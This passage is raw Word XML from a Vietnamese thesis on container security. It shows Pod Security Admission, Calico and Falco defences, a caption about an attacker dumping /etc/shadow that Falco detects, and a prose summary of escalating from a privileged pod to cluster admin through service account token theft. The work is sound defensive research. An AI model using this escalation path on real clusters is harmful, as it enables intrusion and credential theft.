        <w:t xml:space="preserve">    Tại tầng Control Plane: Khi có yêu cầu triển khai một Pod mới (ví dụ: ứng dụng Web), yêu cầu này phải đi qua Admission Controller. Tại đây, hệ thống xác thực chữ ký số của Image và áp đặt luật Pod Security Admission (PSA). Mọi yêu cầu sử dụng cờ --privileged hoặc gắn kết hostPath (nguyên nhân gây ra lỗi TN-01) đều bị từ chối ngay lập tức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3058E0" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chạy lệnh ép cấu hình bảo mật cao nhất cho namespace:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00175415" w14:paraId="67267BAD" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3FCE447E" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="00573972" w:rsidRDefault="00175415" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00573972">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sudo k3s kubectl label --overwrite ns default pod-security.kubernetes.io/enforce=restricted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A6376E3" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="00A13819" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="00A13819">
        <w:t>Kết quả khi apply cấu hình để chạy pod web đã bị chặn lại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D4B08A" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00573972">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="321AFC96" wp14:editId="5058E25B">
            <wp:extent cx="4635500" cy="1048921"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="768331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31706" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4668613" cy="1056414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E858250" w14:textId="69072DB8" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc236001545"/>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17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FB4AA9">
        <w:t>. Hình ảnh chứng minh việc áp dụng cấu hình bảo mật PSA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="72E50B47" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="00FB4AA9" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="00FB4AA9">
        <w:t xml:space="preserve">    Tại tầng Worker Node (Data Plane): Khi Pod được cấp phép khởi chạy, hệ thống phòng thủ động lập tức bao bọc ứng dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EEA94A" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="00FB4AA9">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t>Phòng thủ hệ thống tệp: Hồ sơ Seccomp mặc định được áp dụng vào tiến trình, tước bỏ các đặc quyền gọi nhân (Syscalls) nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E15784" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">        Phòng thủ luồng mạng: Lớp mạng Calico CNI áp dụng mô hình Zero-Trust. Bất kỳ nỗ lực nào nhằm quét mạng nội bộ hoặc đẩy gói tin trái phép sang các microservices khác (như bài thực nghiệm TN-03) đều bị rớt (Drop) tại card mạng ảo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E768C6" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00695A6C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CF08B0E" wp14:editId="33139BA9">
            <wp:extent cx="4576929" cy="1442852"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="10956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2560" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4584067" cy="1445102"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB5DA7" w14:textId="3A9017EA" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc236001546"/>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18</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00695A6C">
        <w:t>. Cấu hình đảm bảo kiến trúc mạng Zero-Trust</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="6534B4D2" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:t>Sau khi cấu hình được áp dụng việc nghe lén traffic mạng từ Pod web tới pod Payment đã bị chặn hoàn toàn. Như vậy trong trường hợp bị tấn công thực tế kẻ tấn công cũng không thể tấn công các pod khác để khai thác thông tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3209BE5F" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00695A6C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12477ABD" wp14:editId="5B3C5E0E">
            <wp:extent cx="4007922" cy="1871276"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8721045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15483" cy="1874806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD9136F" w14:textId="4F64E36A" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc236001547"/>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19</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00695A6C">
        <w:t>. Minh chứng xác thực khả năng phòng thủ của kiến trúc mạng Zero-Trust</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="34CB69C2" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="00695A6C">
        <w:t xml:space="preserve">        Giám sát tàng hình (Stealth Monitoring): Ở lớp sâu nhất (Kernel Space), các module eBPF của Falco liên tục lắng nghe mọi sự kiện. </w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t>Nếu tin tặc khai thác thành công lỗi 0-day để bật Shell tương tác, eBPF sẽ bắt quả tang và truyền tín hiệu cảnh báo về trung tâm vận hành (SOC) chỉ trong vài micro-giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA5088C" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00287933">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F11E2C" wp14:editId="7E1F44B7">
            <wp:extent cx="4688032" cy="1383476"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="149174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46650" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4705631" cy="1388670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2845D13B" w14:textId="70D50650" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc236001548"/>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20</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t>. Thực hiện apply rule Falco nhắm chặn bắt các lệnh nhạy cảm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="19788D57" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00287933">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="109C0C4E" wp14:editId="4D90CE7F">
            <wp:extent cx="4694737" cy="2078182"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2004897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97046" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4706532" cy="2083403"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D31254" w14:textId="4A57CD8C" w:rsidR="00175415" w:rsidRPr="00287933" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc236001549"/>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21</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Hacker tiến hành dump file /etc/shadow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="7C73048B" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008A233C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="474EC6E3" wp14:editId="3430C9C2">
            <wp:extent cx="4964160" cy="1301750"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="209254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44300" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4984794" cy="1307161"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63823524" w14:textId="152FA3DF" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc236001550"/>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22</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t>. Kết quả aler hiển thị cảnh báo đang có lệnh thực thi nhạy cảm trong Pod web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="153D8E9B" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="009823E1" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="009823E1">
        <w:t>Kiến trúc triển khai này tạo ra một vòng lặp bảo mật kín (Closed-loop security), nơi mỗi lớp công nghệ bổ trợ và bọc lót cho nhau, đảm bảo hệ thống Container kiên cố trước cả các mối đe dọa đã biết (Known vulnerabilities) lẫn các kỹ thuật tấn công zero-day tinh vi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759492B1" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="005062A7" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="008E01AC">
        <w:t>Nhằm đánh giá một cách định lượng và khoa học sức chống chịu cũng như mức độ tiêu thụ tài nguyên phần cứng của hệ thống bảo vệ, đề án sử dụng công cụ Apache Benchmark (ab) để tiến hành ép tải (Stress Test) với tốc độ 1000 requests (mức độ đồng thời là 10 luồng song song) nhắm thẳng vào cụm máy chủ Lab thực nghiệm sau khi bật phòng thủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCC8DF4" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="005062A7" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="008E01AC">
        <w:t xml:space="preserve">Số liệu trích xuất thời gian thực từ bài kiểm thử tải thông qua công cụ </w:t>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>Apache Benchmark</w:t>
      </w:r>
      <w:r w:rsidRPr="008E01AC">
        <w:t xml:space="preserve"> và trình giám sát hệ thống htop được tổng hợp đối chứng trực tiếp với môi trường mặc định chưa bảo vệ của Chương 3 tại bảng dưới đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456EBB02" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="1276" w:hanging="142"/>
      </w:pPr>
      <w:r w:rsidRPr="008E01AC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB8E267" wp14:editId="79D378A8">
            <wp:extent cx="4235380" cy="2137445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1348870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242199" cy="2140886"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44090EBF" w14:textId="41E607AC" w:rsidR="00175415" w:rsidRPr="00C05E16" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc236001551"/>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23</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t>. Thực nghiệm đo kiểm hiệu năng của Worker trong khi bị tấn công</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="2A87991E" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008E01AC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E5823B" wp14:editId="7DC1E1D4">
            <wp:extent cx="3707842" cy="3470776"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="10684513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18424" cy="3480681"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F09E4AC" w14:textId="27B5349C" w:rsidR="00175415" w:rsidRPr="005062A7" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc236001552"/>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24</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005062A7">
        <w:t>. Thao tác thực hiện giả lậ tấn công trên Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="29966CFB" w14:textId="77777777" w:rsidR="00175415" w:rsidRPr="005062A7" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="005062A7">
        <w:t>Kết quả đối chứng thực nghiệm chỉ ra một hiện tượng công nghệ vô cùng ý nghĩa: Môi trường phòng thủ sau khi được gia cố bằng cách loại bỏ các cấu hình chia sẻ ổ đĩa cồng kềnh (hostPath: /) và đưa tiến trình về user thường không những không làm suy giảm hiệu năng của hạ tầng đám mây mà còn giúp tối ưu hóa luồng đọc/ghi I/O của nhân Linux. Kết quả này giúp kéo giảm độ trễ phản hồi trung bình của hệ thống xuống dưới ngưỡng lý tưởng (9.11 ms), đồng thời thúc đẩy hiệu suất xử lý vượt bậc đạt 1097.66 requests/second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADFB280" w14:textId="77777777" w:rsidR="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="008E01AC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12017E66" wp14:editId="5E5AD69C">
            <wp:extent cx="4644924" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="140678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84743" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4656527" cy="2291711"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF9FC2" w14:textId="26AA8C80" w:rsidR="00175415" w:rsidRPr="005062A7" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc236001553"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00452426">
        <w:t xml:space="preserve">. Hiệu xuất đo lường sau khi triển </w:t>
      </w:r>
      <w:r w:rsidR="00C77A90" w:rsidRPr="00CA296C">
        <w:t>khai</w:t>
      </w:r>
      <w:r w:rsidRPr="00452426">
        <w:t xml:space="preserve"> các giải pháp bảo vệ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="71B20DD9" w14:textId="5DE80A6B" w:rsidR="00175415" w:rsidRPr="00175415" w:rsidRDefault="00175415" w:rsidP="00175415">
      <w:r w:rsidRPr="005062A7">
        <w:t>Hao phí tài nguyên CPU và RAM ghi nhận từ htop chứng minh rằng việc phối hợp giữa các rào cản nhân Linux gốc (Seccomp, PSS) cùng cấu trúc giám sát siêu nhẹ eBPF của Falco hoàn toàn đáp ứng trọn vẹn mục tiêu nghiên cứu đã đặt ra tại phần Mở đầu đề tài: Xây dựng giải pháp an ninh toàn diện, bảo vệ kiên cố nhưng gần như trong suốt và không gây ảnh hưởng tiêu cực đến hiệu năng vận hành thực tế của các thiết bị cũng như máy chủ doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D808787" w14:textId="2B8A3F7B" w:rsidR="00B427E4" w:rsidRDefault="002A16DE" w:rsidP="002A16DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết luận chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="189EEC38" w14:textId="02431C44" w:rsidR="002A16DE" w:rsidRPr="00175415" w:rsidRDefault="002A16DE" w:rsidP="002A16DE">
      <w:bookmarkStart w:id="119" w:name="_Hlk236003302"/>
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve">Chương </w:t>
      </w:r>
      <w:r w:rsidR="00CB3206" w:rsidRPr="00175415">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve"> đã hoàn thành việc xây dựng môi trường thực nghiệm với các kịch bản tấn công giả định (PoC) đại diện cho những mối đe dọa thực tế nhất đối với hạ tầng container. Kết quả thực chứng từ ba kịch bản TN-01, TN-02 và TN-03 đã làm sáng tỏ cơ chế leo thang từ lỗi cấu hình sai đặc quyền (privileged) đến việc chiếm quyền Cluster Admin thông qua đánh cắp định danh (Service Account Token) và khai thác mạng phẳng để nghe lén lưu lượng. Những minh chứng này không chỉ khẳng định tính dễ tổn thương của các thiết lập mặc định mà còn cung cấp dữ liệu quan trọng để định hình các yêu cầu phòng thủ trong chương tiếp theo.</w:t>
      </w:r>
      <w:r w:rsidR="00175415" w:rsidRPr="00175415">
        <w:t xml:space="preserve"> Đặc biệt, kết quả thử nghiệm hiệu năng cho thấy việc ứng dụng công nghệ eBPF và tối ưu hóa cấu hình nhân Linux không những không gây suy giảm tài nguyên mà còn giúp hệ thống vận hành ổn định và tối ưu hơn (độ trễ 9.11 ms, 1097.66 rps), đáp ứng trọn vẹn yêu cầu bảo mật kiên cố nhưng vẫn gần như trong suốt đối với hiệu năng ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CC41C" w14:textId="746F4A22" w:rsidR="00026BE1" w:rsidRPr="00727AA1" w:rsidRDefault="00026BE1" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc235976394"/>
      <w:bookmarkEnd w:id="119"/>
      <w:r w:rsidRPr="00727AA1">
        <w:lastRenderedPageBreak/>
        <w:t>KẾT LUẬN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="79DC5450" w14:textId="77777777" w:rsidR="00026BE1" w:rsidRPr="00DE4E85" w:rsidRDefault="00026BE1" w:rsidP="00C50BFB">
      <w:r w:rsidRPr="00DE4E85">
        <w:t xml:space="preserve">Đề án tốt nghiệp mang tên </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4E85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"Nghiên cứu phương thức tấn công vào hệ thống container"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4E85">
